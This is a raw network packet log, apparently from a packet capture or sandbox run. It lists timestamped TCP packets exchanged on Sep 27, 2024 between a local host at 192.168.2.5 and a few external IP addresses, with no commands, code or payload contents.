                                                                          Sep 27, 2024 04:21:17.697494984 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697561026 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697571993 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697582960 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697593927 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697598934 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697603941 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697617054 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697649002 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.700676918 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:17.704236984 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:17.704247952 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:17.704252958 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:17.704281092 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:17.704292059 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:17.704301119 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:17.704330921 CEST4971945580192.168.2.565.21.18.51
                                                                          Sep 27, 2024 04:21:17.704380035 CEST4971945580192.168.2.565.21.18.51
                                                                          Sep 27, 2024 04:21:17.725852013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.725887060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.725898981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.725909948 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.725922108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.725930929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.725934982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.725950956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.726005077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.726016045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.726016045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.726079941 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.728223085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.728235960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.728247881 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.728296041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.728307962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.728318930 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.728332043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.728342056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.728342056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.728343010 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.728389025 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.728389025 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.732709885 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.732820034 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.732929945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.732953072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.732970953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.732983112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.732989073 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.732991934 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.732995033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733000994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.733016968 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733027935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733032942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733046055 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.733047962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733059883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733071089 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733081102 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733093023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733103037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.733130932 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.733130932 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.733201027 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.734124899 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734136105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734147072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734205961 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.734231949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734246969 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734260082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734271049 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734271049 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.734285116 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734294891 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.734395027 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.734751940 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734798908 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.734807014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734824896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734838009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734855890 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734864950 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.734869003 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734882116 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.734908104 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.734908104 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735115051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735296965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735347986 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735362053 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735373974 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735416889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735416889 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735430956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735443115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735455036 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735466003 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735488892 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735488892 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735575914 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735609055 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735625982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735640049 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735651016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735661983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735668898 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735678911 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735691071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.735749960 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735749960 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.735984087 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736056089 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736066103 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736083984 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736093998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736097097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.736107111 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736162901 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.736162901 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.736181974 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736202002 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736215115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736227036 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736242056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736260891 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736273050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736277103 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.736277103 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.736314058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736319065 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.736320019 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.736388922 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.736721992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.736974955 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.741118908 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741131067 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741143942 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741213083 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741224051 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741235018 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741256952 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741267920 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741271019 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741278887 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741297960 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741298914 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741311073 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741322041 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741326094 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741333961 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741352081 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741353035 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741364956 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741377115 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741379023 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741394043 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741396904 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741405010 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741456985 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741475105 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741487980 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741488934 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741498947 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741516113 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741525888 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741527081 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741537094 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741549015 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741563082 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741576910 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741588116 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741589069 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741600990 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741607904 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741611958 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741622925 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741640091 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741682053 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741708040 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741741896 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741744995 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741754055 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741776943 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741786957 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741796017 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741799116 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741817951 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741830111 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741839886 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741842031 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741864920 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741884947 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741920948 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741931915 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741950035 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741960049 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741971970 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.741977930 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.741986036 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.742003918 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.742011070 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.742013931 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.742027044 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.742060900 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.755014896 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:17.761570930 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.761583090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.761596918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.761630058 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.761635065 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.761646986 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.761661053 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.761672020 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.761682987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.761709929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.761710882 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.761857033 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764189005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764202118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764214993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764256001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764266968 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764275074 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764280081 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764292002 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764307976 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764334917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764377117 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764436007 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764448881 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764460087 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764471054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764482021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764498949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764507055 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764507055 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764530897 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764604092 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764616013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764628887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764638901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764648914 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764650106 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764662027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764694929 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764700890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764700890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764708042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764719963 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764730930 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.764763117 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.764858961 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.783123016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783142090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783154011 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783176899 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783189058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783200979 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783214092 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783258915 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.783341885 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.783448935 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783461094 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783473015 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783510923 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783526897 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783539057 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783545971 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783551931 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783584118 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783622980 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783637047 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783653975 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783664942 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783675909 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783682108 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783689022 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783701897 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783706903 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783716917 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783730030 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783734083 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783749104 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783771038 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783828974 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783869982 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783878088 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783881903 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783906937 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783914089 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783925056 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783926964 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783938885 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783946991 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783967018 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.783967972 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783977985 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783989906 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.783991098 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784002066 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784014940 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784027100 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784034967 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784038067 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784075975 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784075975 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784087896 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784101009 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784116983 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784126997 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784163952 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784188032 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784199953 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784209967 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784223080 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784234047 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784238100 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784257889 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784288883 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.784424067 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784435987 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784447908 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784461021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.784473896 CEST8049725185.215.113.117192.168.2.5
